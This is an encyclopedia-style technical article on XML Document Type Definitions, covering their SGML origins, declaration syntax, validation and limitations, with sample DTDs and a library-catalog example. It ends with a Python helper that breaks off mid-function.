Document type definition

A Document Type Definition (DTD) is a formal schema language, inherited from SGML and defined for XML in the Extensible Markup Language (XML) 1.0 specification, that specifies the logical structure, elements, attributes, and entities allowed in a document, enabling validation of its conformance to predefined rules. Standardized for XML by the World Wide Web Consortium (W3C) in 1998, the DTD is carried by the document type declaration and enforces constraints on document content, supporting consistency and interoperability in data exchange. It consists of markup declarations that define the grammar of the document, including element hierarchies, attribute types and defaults, and entity substitutions. DTDs can be embedded directly in an XML document as an internal subset or referenced externally via a URI as an external subset, allowing modular reuse across multiple documents. Validating XML processors must read the entire DTD and report any violations of its constraints, such as invalid element nesting or undeclared attributes, distinguishing valid documents from merely well-formed ones. While adequate for basic structural validation, DTDs have limitations, including the lack of rich data types and of native namespace support, which led to the development of alternatives such as XML Schema Definition (XSD) for more advanced needs. Despite these limitations, DTDs remain a foundational component of XML, widely used in legacy systems and standards requiring simple validation.

Introduction

Definition and Purpose

A Document Type Definition (DTD) is a declarative schema language used in markup languages such as SGML and XML to define the legal structure of documents, specifying the permissible elements, their content models, attributes, entities, and notations. It serves as a grammar that outlines the hierarchical organization and constraints for a class of documents, ensuring that only declared components can appear and only in defined arrangements. Originating as part of the SGML standard, the DTD mechanism was adapted for XML to provide a lightweight way to express document constraints.

The primary purposes of a DTD are to enforce document validity against predefined rules, thereby guaranteeing structural integrity; to facilitate interoperability by standardizing document formats across applications and systems; and to establish a contract for data exchange, in which producers and consumers agree on expected content and organization. By constraining what constitutes a conforming document, DTDs help catch errors early and make downstream processing more reliable.

Central to DTDs is the distinction between well-formed documents, which comply with the basic syntactic rules of the markup language (e.g., proper tag nesting and attribute quoting in XML), and valid documents, which must additionally satisfy the structural constraints declared in the DTD. DTDs express these constraints through content models that restrict element occurrences using operators for sequences (commas), choices (vertical bars), and repetitions (asterisks, plus signs, or question marks), written in a parenthesized, EBNF-like notation. For instance, (element1, element2*) denotes a required element1 followed by zero or more element2 instances. This declarative approach allows precise control over document structure without procedural logic, promoting reusability and modularity in schema design.

Historical Development

The Document Type Definition (DTD) originated as a core component of the Standard Generalized Markup Language (SGML), formalized in the International Organization for Standardization (ISO) standard ISO 8879:1986, which defined SGML as a meta-language for describing markup structures in documents so as to separate content from presentation. This standard introduced DTDs to specify the logical structure, elements, attributes, and entities of documents, enabling generalized markup for interchange and processing across systems.

Early adoption of SGML DTDs extended to the development of HTML, where versions prior to HTML 2.0 (circa 1990–1995) were defined using SGML DTDs to outline permissible tags and structure, as distributed by Tim Berners-Lee and collaborators at CERN. The first formal HTML DTD appeared in July 1992 via the www-talk mailing list, establishing HTML as an SGML application and influencing web document standards. In the late 1990s, HTML 4.0 (1997) continued this conformance to ISO 8879, carrying SGML's rigorous validation over to the burgeoning web.

The transition to Extensible Markup Language (XML) marked a pivotal evolution, with XML 1.0 issued as a W3C Recommendation on February 10, 1998, positioning XML as a simplified subset of SGML while retaining DTDs for validation, with modifications for web efficiency such as case-sensitive names and deterministic content models. These simplifications included restrictions on parameter entity references in the internal DTD subset, where they may appear only between markup declarations and not inside them, unlike the broader allowances in SGML, to reduce parsing complexity and ambiguity. XML DTDs thus facilitated easier implementation, removing SGML features like link processes and optional notations. DTDs influenced subsequent web standards, notably XHTML 1.0 (W3C Recommendation, January 26, 2000), which reformulated HTML as an XML application using three DTD variants (Strict, Transitional, and Frameset) to enforce stricter syntax while maintaining backward compatibility.

After 2000, the release of XML Schema 1.0 (W3C Recommendation, May 2, 2001) introduced a more expressive, XML-native alternative for schema definition, leading to declining reliance on DTDs for new applications because of XML Schema's support for data types, namespaces, and modularity. Despite this shift, DTDs persisted in legacy systems and certain publishing workflows, though by the mid-2000s trends favored XML Schema and other schema languages such as RELAX NG.

Document Association

Declaration Methods

Document Type Definitions (DTDs) are associated with XML documents through the DOCTYPE declaration, which appears in the XML prolog and specifies the root element name along with optional references to DTD content. The basic syntax is <!DOCTYPE root-element-name [internal-subset]> for an internal DTD or <!DOCTYPE root-element-name external-ID> for an external reference, where external-ID is a SYSTEM or PUBLIC identifier and may be followed by an internal subset in square brackets. The declaration defines the document's grammar and must conform to the production rules of the XML specification.

The SYSTEM identifier references a DTD via a URI, such as SYSTEM "example.dtd", suitable for local files or web-accessible resources, allowing parsers to retrieve the external subset directly. In contrast, the PUBLIC identifier is used for widely recognized DTDs and consists of a formal public identifier (FPI) followed by a system identifier as a fallback, formatted as PUBLIC "-//organization//DTD description//language" "uri", exemplified by PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd". This structure aids interoperability: a processor can resolve the FPI through a local catalog and fall back to the system identifier for retrieval if the FPI is not cataloged.

The DOCTYPE declaration must be placed after any XML declaration (e.g., <?xml version="1.0"?>) and before the document's root element, so that it is processed as part of the prolog. Within external subsets, conditional sections allow selective inclusion or exclusion of declarations using the INCLUDE or IGNORE keywords, such as <![INCLUDE[ <!-- declarations --> ]]> or <![IGNORE[ <!-- ignored content --> ]]>. The keyword is commonly supplied through a parameter entity reference, and conditional sections may appear only in the external subset and in external parameter entities, not in the internal subset.

An XML document may contain at most one DOCTYPE declaration; a second one does not match the document grammar and is a fatal well-formedness error. Non-validating parsers may ignore external references entirely, but validating parsers must read and apply the specified DTD. Where the internal and external subsets both declare the same entity or the same attribute, the internal subset's declaration takes precedence because it is read first, which allows a document to override parts of a shared DTD locally.
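
The declaration forms and conditional sections described above can be sketched as follows. The file name memo.dtd, the element names, and the parameter entities draft and final are illustrative assumptions, not taken from any published DTD. The first listing is a hypothetical external subset whose conditional sections are switched by parameter entities:

```xml
<!-- memo.dtd: hypothetical external subset -->
<!ENTITY % draft "IGNORE">
<!ENTITY % final "INCLUDE">

<![%draft;[
  <!ELEMENT memo (body, comments?)>
]]>
<![%final;[
  <!ELEMENT memo (body)>
]]>

<!ELEMENT body     (#PCDATA)>
<!ELEMENT comments (#PCDATA)>
```

A document can then select the draft variant by declaring the same parameter entities in its internal subset, which is read before the external subset:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!-- A PUBLIC form would add an FPI before the system identifier, e.g.
     PUBLIC "-//Example//DTD Memo 1.0//EN" "memo.dtd" (hypothetical FPI). -->
<!DOCTYPE memo SYSTEM "memo.dtd" [
  <!ENTITY % draft "INCLUDE">
  <!ENTITY % final "IGNORE">
]>
<memo>
  <body>Quarterly figures attached.</body>
  <comments>Check the totals.</comments>
</memo>
```

Under these assumptions the first conditional section is included and the second ignored, so memo is declared exactly once, with the optional comments child allowed.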

Internal and External Subsets

The Document Type Definition (DTD) in XML can be divided into internal and external subsets, each serving a distinct role in defining the structure and constraints for an XML document. The internal subset is embedded directly within the DOCTYPE declaration using square brackets, allowing markup declarations to be specified inline with the document. This approach keeps the DTD self-contained, eliminating the need for external resources and making the document portable without dependencies on network access or file systems. However, the internal subset has limitations, particularly regarding parameter entities: references to parameter entities are permitted only in positions where whole markup declarations can occur (i.e., between declarations), not within the declarations themselves, which restricts modularity and preprocessing compared to external subsets.

In contrast, the external subset is referenced from the DOCTYPE declaration via a system identifier (URI), optionally accompanied by a public identifier (FPI), and its content is loaded from an external file or resource. This design promotes modularity by enabling the DTD to be shared across multiple XML documents, facilitates caching for repeated use, and fully supports parameter entity references within markup declarations, allowing advanced preprocessing and conditional inclusion of rules. External subsets are particularly advantageous in environments requiring consistent validation across distributed systems, though they introduce a dependency on resource availability.

When both subsets are present in a DOCTYPE declaration, as in <!DOCTYPE root-element SYSTEM "external.dtd" [internal declarations]>, they are combined to form the complete DTD. The internal subset is processed first, so its entity and attribute-list declarations override conflicting ones in the external subset, because the first declaration encountered is the one that binds. Element type declarations, by contrast, may not be repeated: declaring the same element type twice is a validity error.

Processing proceeds sequentially: the internal subset is read immediately, followed by the external subset if referenced, and all declarations are integrated into a unified set for validation. Error handling differs by subset. Syntax errors in the internal subset are fatal well-formedness errors for every processor. Failure to load an external subset, for example because of a network failure, affects only processors that attempt to read it: a validating processor must report the problem, whereas a non-validating processor that skips external entities may still accept the document as well-formed.

Internal subsets suit simple, standalone XML configurations where self-containment is the priority, such as small scripts or isolated data exchanges that do not require shared rules. External subsets suit enterprise XML applications, where a single DTD enforces standards across many documents, supporting scalable validation in systems such as document management or data interchange protocols.
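
A minimal sketch of how the two subsets combine, assuming a hypothetical shared file named common.dtd and a made-up entity named company:

```xml
<!-- common.dtd: hypothetical shared external subset -->
<!ELEMENT letter (#PCDATA)>
<!ATTLIST letter lang NMTOKEN "en">
<!ENTITY company "Example Corp">
```

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE letter SYSTEM "common.dtd" [
  <!-- Read before common.dtd, so this binding of "company" is the one used. -->
  <!ENTITY company "Example Corp (Europe)">
]>
<letter>Issued by &company;.</letter>
```

A processor that reads both subsets would be expected to expand the reference to "Example Corp (Europe)" and to supply lang="en" from the external subset, since the document does not override that attribute default.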

Core Declarations

Element Type Declarations

Element type declarations in a Document Type Definition (DTD) specify the permissible content for elements in an XML document, defining the structure and hierarchy of the markup. These declarations use the syntax <!ELEMENT Name contentspec>, where Name identifies the element type and contentspec describes the allowed content model. The content specification can take several forms, including predefined keywords or expressions built from child element names and operators.

The simplest content models are the keywords EMPTY, which permits no content within the element (e.g., <!ELEMENT br EMPTY> for a line-break element), and ANY, which allows any well-formed content made up of declared elements and character data (e.g., <!ELEMENT note ANY>). For elements containing only parsed character data, the model (#PCDATA) is used (e.g., <!ELEMENT title (#PCDATA)>), restricting the content to text without nested elements. Structured models, known as element content, specify child elements using the children production, which combines choices, sequences, and repetition operators.

Content models employ specific operators to define relationships among child elements: the comma (,) denotes a required sequence (e.g., (head, body) for ordered child elements); the vertical bar (|) indicates a choice (e.g., (p | div) for alternatives); the question mark (?) makes an item optional (zero or one occurrence, e.g., (img)?); the asterisk (*) allows zero or more repetitions (e.g., (li)*); and the plus sign (+) requires one or more repetitions (e.g., (li)+). These operators can be nested within parentheses to build hierarchical models, such as <!ELEMENT article (title, (section | para)+)>, which requires a title followed by one or more sections or paragraphs. Within a single parenthesized group, commas and vertical bars cannot be mixed.

Mixed content models combine #PCDATA with optional child elements, declared as (#PCDATA | Name1 | Name2)*, or simply (#PCDATA) for text only. The asterisk permits any interleaving of text and the listed elements, in any order and quantity (e.g., <!ELEMENT p (#PCDATA | em | strong)*> for paragraphs with inline emphasis). In XML, a mixed content model must begin with #PCDATA, list each permitted element name once, and end with *; it cannot constrain the order or number of the child elements.

A key requirement for content models in XML DTDs is determinism: the model must be unambiguous, so that a processor can match each element in the document against a single position in the model without looking ahead. For instance, ((b, c) | (b, d)) is non-deterministic, because on reading b the processor cannot tell which branch applies; the equivalent model (b, (c | d)) is deterministic. The XML 1.0 specification treats non-deterministic models as an error for compatibility with SGML, which keeps validation simple and predictable.
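
The operators above can be illustrated with a small set of declarations. The element names (article, entry, term, and so on) are hypothetical and chosen only for illustration:

```xml
<!-- Sequence and choice: one title, then one or more section or para children. -->
<!ELEMENT article (title, (section | para)+)>
<!ELEMENT title   (#PCDATA)>
<!ELEMENT section (title, para*)>

<!-- Mixed content: text interleaved with em and strong in any order. -->
<!ELEMENT para    (#PCDATA | em | strong)*>
<!ELEMENT em      (#PCDATA)>
<!ELEMENT strong  (#PCDATA)>

<!-- Non-deterministic (shown commented out): after <term>, either branch could apply.
     <!ELEMENT entry ((term, short) | (term, long))> -->

<!-- Deterministic rewrite that accepts the same documents. -->
<!ELEMENT entry   (term, (short | long))>
<!ELEMENT term    (#PCDATA)>
<!ELEMENT short   (#PCDATA)>
<!ELEMENT long    (#PCDATA)>
```

Factoring the shared leading element out of the choice, as in the last group, is the usual way to make such a model deterministic.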

Attribute List Declarations

Attribute list declarations in a Document Type Definition (DTD) specify the attributes permitted for a given element type, including their types, default values, and any associated constraints. These declarations ensure that XML documents adhere to predefined rules for attribute usage, facilitating validation. Defined in the XML 1.0 specification, an attribute list declaration uses the <!ATTLIST keyword followed by the element name and zero or more attribute definitions.

The grammar is AttlistDecl ::= '<!ATTLIST' S Name AttDef* S? '>', where Name identifies the element type and S denotes whitespace. Each AttDef has the form S Name S AttType S DefaultDecl, where Name is the attribute name, AttType specifies the type, and DefaultDecl defines the default handling. Multiple attributes for the same element can be listed sequentially within a single <!ATTLIST> declaration. For example, <!ATTLIST book title CDATA #REQUIRED> declares a required title attribute of type CDATA for the book element.

Attribute types fall into three categories: string types, tokenized types, and enumerated types. The string type CDATA treats the attribute value as character data, allowing any string in which the less-than sign (<) and ampersand (&) are escaped. Tokenized types include ID for unique identifiers (no two elements in the document may share the same ID value), IDREF for a single reference to an ID, IDREFS for space-separated lists of IDREFs, ENTITY for a reference to an unparsed entity, ENTITIES for lists thereof, NMTOKEN for name tokens (conforming to the Nmtoken production), and NMTOKENS for lists of NMTOKENs. Enumerated types consist of either a NotationType (a list of declared notation names) or an Enumeration (a parenthesized list of Nmtokens separated by vertical bars, e.g., (red | green | blue)). These types impose validity constraints, such as at most one ID attribute per element type and proper referencing for IDREF and NOTATION.

Default declarations determine how attribute values are handled if not explicitly provided in the instance document. The keyword #REQUIRED mandates that the attribute appear in every occurrence of the element. #IMPLIED makes the attribute optional, with no default value supplied by the parser. #FIXED followed by a quoted value (e.g., #FIXED "en") requires that any provided value match the fixed one, and the parser supplies it if the attribute is absent. A plain quoted value (e.g., "default") provides a default that the parser supplies if the attribute is omitted. Default and fixed values must themselves be legal for the declared attribute type.

The ID and IDREF types enable cross-referencing within the document: ID values must be unique and must match the Name production, an ID attribute must be declared #IMPLIED or #REQUIRED, and each IDREF value must match the ID of some element in the document. The NOTATION type links attributes to declared notations, ensuring that the value corresponds to a notation name.

When more than one definition is provided for the same attribute of an element type, the first definition binds and later ones are ignored; likewise, multiple <!ATTLIST> declarations for the same element type are merged. Processors may issue a warning in either case, but neither is an error.

Because DTDs predate XML namespaces, a prefixed element or attribute name is declared as a literal string, and the DTD cannot express the binding between a prefix and its namespace URI. This limits the use of DTDs in namespaced documents and their expressiveness compared to later schema languages. These rules keep parsing predictable but reflect the simplicity of DTDs relative to more advanced validation tools.
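
As a sketch of the attribute types and defaults discussed in this section, the following document uses a hypothetical catalog vocabulary; the element and attribute names are assumptions made for illustration:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE catalog [
  <!ELEMENT catalog (book+)>
  <!ELEMENT book (#PCDATA)>
  <!ATTLIST book
    id      ID                       #REQUIRED
    follows IDREF                    #IMPLIED
    format  (hardcover | paperback)  "paperback"
    lang    NMTOKEN                  #FIXED "en"
    note    CDATA                    #IMPLIED>
]>
<catalog>
  <book id="b1" format="hardcover">First Volume</book>
  <book id="b2" follows="b1">Second Volume</book>
</catalog>
```

Here the second book omits format and lang, so a processor that reads the DTD would supply format="paperback" and lang="en". The follows value is valid because an element with the ID b1 exists in the document.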

Entity Declarations

Entity declarations in a Document Type Definition (DTD) define named entities that serve as placeholders for reusable content, enabling text replacement during XML parsing. These declarations use the <!ENTITY> construct and are useful for modularizing content, avoiding repetition, and incorporating external resources. General entities are referenced in the document instance with &name;, while parameter entities, referenced with %name;, are restricted to use within the DTD itself for building modular grammars.

General entities can be internal or external. An internal general entity declaration provides replacement text directly within the DTD, using the syntax <!ENTITY name "replacement text">. For example, <!ENTITY copyright "Copyright © 2025"> allows the reference &copyright; to insert the specified text during parsing. External general entities reference content outside the DTD via a system identifier, as in <!ENTITY example SYSTEM "http://example.com/data.xml">, which loads and parses the external resource when referenced. Parsed external entities must contain well-formed content, and expansion substitutes the fetched content for the reference.

Parameter entities support DTD modularity by allowing substitutions within the DTD, declared as <!ENTITY % name "replacement text"> for internal or <!ENTITY % name SYSTEM "uri"> for external. They are particularly useful for including common declaration blocks, such as <!ENTITY % iso-pub SYSTEM "http://www.iso.org/pub.dtd"> %iso-pub;, which inserts an external DTD fragment. In the internal DTD subset (within the document's DOCTYPE declaration), parameter entity references are restricted: they may appear only where a complete markup declaration could appear, never inside a markup declaration. Declarations in the external subset or in external parameter entities are not subject to this restriction, but the replacement text must still nest properly within the declarations that contain it.

XML defines five predefined general entities that all processors must recognize without explicit declaration: &amp; for &, &lt; for <, &gt; for >, &apos; for ', and &quot; for ". These escape characters that would otherwise be read as markup. If they are declared explicitly, lt and amp must use a doubly escaped character reference, as in <!ENTITY lt "&#38;#60;">, so that the replacement text is not itself interpreted as markup. Unparsed entities, always external and declared with <!ENTITY name SYSTEM "uri" NDATA notation-name>, hold non-XML data (e.g., binary files) and are referenced only in attributes of type ENTITY or ENTITIES, requiring a corresponding notation declaration.

Entity expansion follows strict rules during parsing, before validation, where references are replaced by their declared content to form the logical document structure. For an internal entity, character references and parameter entity references in the literal entity value are expanded when the declaration is read, while general entity references are left as they are and expanded only when the entity itself is referenced. A well-formedness constraint forbids an entity from referring to itself, directly or indirectly. External entities are retrieved, processed for any text declaration (specifying version and encoding), and integrated similarly, although non-validating parsers may skip external entities. This mechanism lets entities promote reuse while maintaining document integrity. The XML specification itself sets no expansion limit, but many parsers impose limits on expansion depth or size to mitigate denial-of-service attacks built from nested entities.
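
The difference between parameter and general entities can be sketched with a hypothetical external subset, here called inline.dtd; all names in it are assumptions for illustration. Because the parameter entity is referenced inside element declarations, the declarations must live in the external subset rather than the internal one:

```xml
<!-- inline.dtd: hypothetical external subset -->
<!ENTITY % inline "em | strong | code">

<!-- The parameter entity is expanded inside each content model. -->
<!ELEMENT p      (#PCDATA | %inline;)*>
<!ELEMENT li     (#PCDATA | %inline;)*>
<!ELEMENT em     (#PCDATA)>
<!ELEMENT strong (#PCDATA)>
<!ELEMENT code   (#PCDATA)>

<!-- General entity for use in document content. -->
<!ENTITY copy "&#169;">
```

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE p SYSTEM "inline.dtd">
<p>&copy; 2025 <em>Example Press</em> &amp; partners</p>
```

The reference &amp; needs no declaration because it is predefined, whereas &copy; is resolved only by a processor that actually reads inline.dtd; a non-validating processor that skips the external subset may leave it unexpanded.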

Notation Declarations

Notation declarations in Document Type Definitions (DTDs) identify the format of non-XML data, such as images or other external resources, allowing XML processors to recognize the format and pass it to an appropriate application. Each declaration provides a name for the notation along with an external identifier that describes the notation or the software needed to process it. Notations are primarily associated with unparsed entities, which reference non-XML content and so allow binary or other non-XML data to be referenced from XML documents without being parsed as markup.

The syntax for a notation declaration follows the form <!NOTATION Name (SYSTEM "SystemLiteral" | PUBLIC "PublicID" "SystemLiteral")>, where Name is the name of the notation; in the PUBLIC form the system literal may be omitted. In the SYSTEM form, the declaration gives a system identifier (a URI) pointing to the notation's definition or to a helper application, as in <!NOTATION gif SYSTEM "http://example.com/example.gif">, which might identify the GIF image format. The PUBLIC form includes a public identifier (often a Formal Public Identifier or FPI), optionally followed by a system literal, providing a standardized name for broader interoperability, for example: <!NOTATION gif PUBLIC "-//IETF//NONSGML GIF 89a//EN" "http://example.com/example.gif">. Notation names must be unique within the DTD, and any notation referenced in an entity or attribute declaration must be declared.

In XML, notations are tied to unparsed entities through the NDATA keyword in entity declarations, where the notation name indicates the data's type, but the DTD itself performs no validation of the external data's conformance to that notation. Validating XML processors must report a referenced notation that is undeclared. This mechanism ensures that applications can be told the data format without requiring the parser to interpret the content.

Originating from SGML (ISO 8879:1986), notation declarations were commonly used to integrate multimedia content such as images, audio, and formatted text into documents by linking non-SGML entities to external processing tools. In modern XML contexts their use has become limited, as alternatives like XML Schema provide more robust mechanisms for defining and validating data types, reducing reliance on notations for non-XML integration.
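
The way a notation, an unparsed entity, and an ENTITY attribute fit together can be sketched as follows. The notation name png, its system identifier, the file chart.png, and the report vocabulary are all assumptions for illustration:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE report [
  <!-- The system identifier here is only a label an application might recognize. -->
  <!NOTATION png SYSTEM "image/png">

  <!-- Unparsed entity: the parser never reads chart.png itself. -->
  <!ENTITY chart SYSTEM "chart.png" NDATA png>

  <!ELEMENT report (figure)>
  <!ELEMENT figure EMPTY>
  <!ATTLIST figure src ENTITY #REQUIRED>
]>
<report>
  <figure src="chart"/>
</report>
```

Note that the attribute value is the bare entity name chart, not a reference of the form &chart;. The parser reports the entity's system identifier and notation to the application, which decides how to handle the data.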

Validation Mechanics

Parsing and Validation Process

The parsing and validation process for a Document Type Definition (DTD) in XML begins with the XML processor loading the DTD, which may consist of an internal subset embedded within the document's DOCTYPE declaration and an optional external subset referenced via SYSTEM or PUBLIC identifiers. A validating processor must read and process the entire DTD, including all external parsed entities it references, to construct the models needed for validation. Once the DTD is loaded, the processor builds content models from element type declarations, which specify allowable structures such as EMPTY, ANY, mixed content, or sequences of elements, and records attribute list declarations that define attribute types (e.g., CDATA, ID, NMTOKEN), default values, and required status.

Following DTD loading and model construction, the processor parses the document entity, resolving entity references and constructing the element tree while performing well-formedness checks, such as proper nesting and tag matching. For validation, the processor then verifies that the document's root element matches the name declared in the DOCTYPE and that the overall structure adheres to the content models. Specific validity checks include confirming element presence and order against the content model (e.g., that required children are present and in sequence), validating attribute values against their declared types and applying defaults where values are unspecified, checking that every referenced entity is declared, and enforcing uniqueness of ID attribute values across the document.

Parser behavior depends on configuration. Non-validating parsers check only well-formedness and may skip the external DTD subset; a declaration of standalone="yes" in the XML declaration asserts that skipping it does not change the information passed to the application. Validating parsers must process the whole DTD and report all validity constraint violations as errors. In implementations like libxml2, validation is enabled via parser options such as XML_PARSE_DTDVALID, while separate options (such as XML_PARSE_DTDLOAD and XML_PARSE_NONET) control the loading of the external subset and network access, for security and performance.

Validating parsers treat validity violations as non-fatal errors that must be reported, though processing may continue at the user's discretion, whereas well-formedness violations are fatal errors that halt normal processing. Performance considerations in DTD validation include avoiding repeated network fetches of external subsets, commonly by using XML catalogs to map identifiers to local copies or by caching parsed grammars, as in parsers like Apache Xerces. Basic DTD validation does not natively support namespaces, treating qualified names as opaque strings without special handling, which can limit its use in namespaced XML environments.
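
The distinction between well-formedness and validity can be made concrete with a document that parses without error but violates its DTD in three ways. The order vocabulary is hypothetical:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE order [
  <!ELEMENT order (item+)>
  <!ELEMENT item (#PCDATA)>
  <!ATTLIST item sku ID #REQUIRED>
]>
<order>
  <item sku="A1">Widget</item>
  <!-- Validity error: the ID value A1 is used a second time. -->
  <item sku="A1">Gadget</item>
  <!-- Validity error: the required sku attribute is missing. -->
  <item>Sprocket</item>
  <!-- Validity error: note is undeclared and not allowed by (item+). -->
  <note>Rush delivery</note>
</order>
```

A non-validating parser would accept this document, since every tag is properly nested and closed. A validating parser would be expected to report each of the three violations, without necessarily stopping at the first one.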

Limitations in XML Context

Document Type Definitions (DTDs), while functional for basic structure validation in XML, face significant constraints when applied within the XML framework, particularly when contrasted with their broader capabilities in the originating SGML standard. These limitations stem from later XML design priorities, such as namespace integration and advanced data modeling, which DTDs were never updated to accommodate.

A primary limitation is the lack of namespace awareness. DTDs cannot declare or validate elements and attributes by namespace; they treat qualified names as literal strings without recognizing the URI bound to the prefix. This results in validation failures or ambiguities when documents combine multiple vocabularies, because the DTD constrains only the lexical form of names rather than their expanded names. For instance, a document that uses a different prefix for the same namespace fails validation, and elements from different namespaces that happen to share a prefix and local name cannot be told apart.

DTDs also suffer from weak typing, offering only rudimentary attribute types such as CDATA, ID, IDREF, and enumerated lists, with no support for numeric types like integers or decimals, nor for pattern matching via regular expressions. Element content is restricted to undifferentiated #PCDATA or mixed models, with no facets for constraints like minimum or maximum values, length limits, or lexical patterns, which are essential for rigorous data validation in applications like electronic commerce or configuration files. Applications must therefore perform their own type checking after validation, undermining the efficiency of DTD-based validation.

Furthermore, DTDs provide no true inheritance or advanced modularity, relying solely on parameter entities for limited reuse, which proves inadequate for constructing complex, extensible vocabularies shared across many document types. Without mechanisms for type derivation, schema inclusion from diverse sources, or hierarchical extension, designing and maintaining large-scale XML vocabularies becomes cumbersome, often requiring verbose duplication of declarations. Textual substitution through entities is too coarse for modular schema development in contemporary XML ecosystems.

Developments after 1998, notably XML Namespaces and XML Schema, have left DTDs increasingly dated for new XML applications. Schema languages are generally preferred for new vocabularies that need namespaces or data typing, while DTDs persist mainly for legacy compatibility and for entity declarations.
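
The namespace limitation can be sketched with a small example. The prefix inv, the namespace URI, and the element names are assumptions for illustration:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE inv:stock [
  <!-- The DTD knows only the literal names inv:stock and inv:part. -->
  <!ELEMENT inv:stock (inv:part*)>
  <!ATTLIST inv:stock xmlns:inv CDATA #FIXED "http://example.com/inventory">
  <!ELEMENT inv:part (#PCDATA)>
]>
<inv:stock>
  <inv:part>Bolt</inv:part>
</inv:stock>
```

This document is valid, and the fixed attribute default supplies the namespace binding. If the same data were written with another prefix bound to the same URI, for example i:stock and i:part, namespace-aware software would treat it as equivalent, but it would be invalid against this DTD because the literal names no longer match.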

Practical Examples

Basic DTD Syntax

A Document Type Definition (DTD) specifies the syntax of XML documents through a series of declarations that define the structure, attributes, entities, and notations used within them. These declarations form the basic building blocks of a DTD and are either enclosed within a DOCTYPE declaration in an XML document or placed in a separate file that the DOCTYPE references. The syntax is formal and follows specific production rules outlined in the XML specification.

Element type declarations define the allowable content model for elements, specifying what child elements or data can appear inside them. The basic syntax is <!ELEMENT name content-spec>, where the content-spec describes the structure, such as a sequence of required child elements. For instance, a simple declaration for a "book" element that must contain a "title" followed by an "author" is written as <!ELEMENT book (title, author)>. This indicates that "book" is a container element with exactly those two child elements in sequence, with no other content permitted. More complex content models, such as choices or repetitions, are detailed in the core declarations section.

Attribute list declarations specify the attributes that can be associated with an element, including their types and whether they are required or optional. The syntax follows <!ATTLIST element-name attribute-name attribute-type default-declaration>. A common example is <!ATTLIST book isbn CDATA #REQUIRED>, which declares an "isbn" attribute for the "book" element as character data (CDATA), making it mandatory for every "book" instance. The CDATA type allows arbitrary text, while the #REQUIRED keyword enforces presence.

Entity declarations provide a way to define reusable text or external resources, promoting modularity in the DTD. The general syntax is <!ENTITY name "replacement text"> for internal entities. An example is <!ENTITY copyright "© 2025">, which defines a "copyright" entity that can be referenced via &copyright; to insert the symbol and year wherever needed. External entities follow a similar pattern but reference files, and unparsed entities (for non-XML data) are covered below.

Notation declarations identify the format of non-XML data, such as images, that may be referenced in the document. The syntax is <!NOTATION name SYSTEM "system-identifier"> for system-specific notations. For example, <!NOTATION jpeg SYSTEM "http://www.iana.org/assignments/media-types/image/jpeg"> declares a notation named "jpeg" pointing to the IANA registration for the media type via a URI. Notations are often combined with unparsed entities, which reference external data without parsing it as XML. The unparsed entity syntax is <!ENTITY name SYSTEM "system-literal" NDATA notation-name>, as in <!ENTITY logo SYSTEM "logo.jpg" NDATA jpeg>, linking the "logo" entity to a file via the previously declared notation. This allows XML documents to refer to non-textual content while remaining valid.

Complete XML Document with DTD

A complete XML document incorporating a Document Type Definition (DTD) places the declarations directly inside the DOCTYPE declaration, defining the permissible structure, elements, attributes, and entities for validation. This approach, known as an internal DTD subset, allows self-contained documents that can be parsed and validated by conforming XML processors. The following example illustrates a simple library catalog, where the root element is library, containing zero or more book elements, each with a required isbn attribute and a title child element whose text references an entity for the publisher name. Here is the full XML document with its internal DTD:
xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE library [
  <!ELEMENT library (book*)>
  <!ELEMENT book (title)>
  <!ELEMENT title (#PCDATA)>
  <!ATTLIST book isbn ID #REQUIRED>
  <!ENTITY publisher "Example Press">
]>
<library>
  <book isbn="BK-123-456-789-0">
    <title>Sample Book &publisher;</title>
  </book>
</library>
In this document, the DTD specifies that the library element contains zero or more book elements (the * quantifier) and that each book requires exactly one title child. The title element is declared with (#PCDATA) content, because a DTD has no default content model and every element type used in a valid document must be declared. The isbn attribute is mandatory and has the ID type, so its value must be an XML name (which is why the example value starts with letters rather than a digit) and must be unique within the document. The entity publisher is expanded during parsing to insert "Example Press" in the title content.

During validation, an XML parser first reads the DOCTYPE declaration to load the internal DTD subset, then processes the document instance against it. It verifies that the root element is library, checks that book elements appear only as direct children of library and conform to the content model (exactly one title subelement), ensures the isbn attribute is present on every book with a valid ID value (a name that is not reused elsewhere in the document), and replaces entity references like &publisher; with their declared values while checking for well-formedness. If the document passes, it is valid; otherwise, the parser reports violations such as undeclared elements or missing required attributes. For instance, omitting the isbn attribute triggers a validity error, because #REQUIRED mandates its presence, and a strict processor may stop at that point.

For external DTD references, the DOCTYPE can point to a separate file via a system identifier (a URI), enabling reuse across multiple documents without embedding the full DTD. This is useful for standardized schemas in larger systems. Consider the same example, but with the DTD in an external file at http://example.com/library.dtd containing the identical declarations:
xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE library SYSTEM "http://example.com/library.dtd">
<library>
  <book isbn="BK-123-456-789-0">
    <title>Sample Book &publisher;</title>
  </book>
</library>
The parser fetches the external DTD from the specified URI, combines it with the internal subset if one is present (declarations in the internal subset take precedence), and performs the same validation checks as in the internal case. This works only if the URI is reachable and resolves to the intended DTD. Common errors here include unreachable URIs and mismatches between the external DTD and the document, such as a reference to &publisher; that cannot be resolved because its declaration was never loaded.
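
Entity expansion and a few of the constraints described for the internal-subset version can be tried out with Python's standard library. This is a sketch under stated assumptions: xml.etree.ElementTree does not validate against DTDs, so check_library (a hypothetical helper) re-implements three of the rules by hand for illustration. It is not a substitute for a validating parser.

```python
import xml.etree.ElementTree as ET

LIBRARY = """<?xml version="1.0"?>
<!DOCTYPE library [
  <!ELEMENT library (book*)>
  <!ELEMENT book (title)>
  <!ELEMENT title (#PCDATA)>
  <!ATTLIST book isbn ID #REQUIRED>
  <!ENTITY publisher "Example Press">
]>
<library>
  <book isbn="BK-123-456-789-0">
    <title>Sample Book &publisher;</title>
  </book>
</library>
"""


def check_library(xml_text):
    """Hand-written stand-in for three DTD constraints; not a DTD validator."""
    root = ET.fromstring(xml_text)  # internal entities are expanded during parsing
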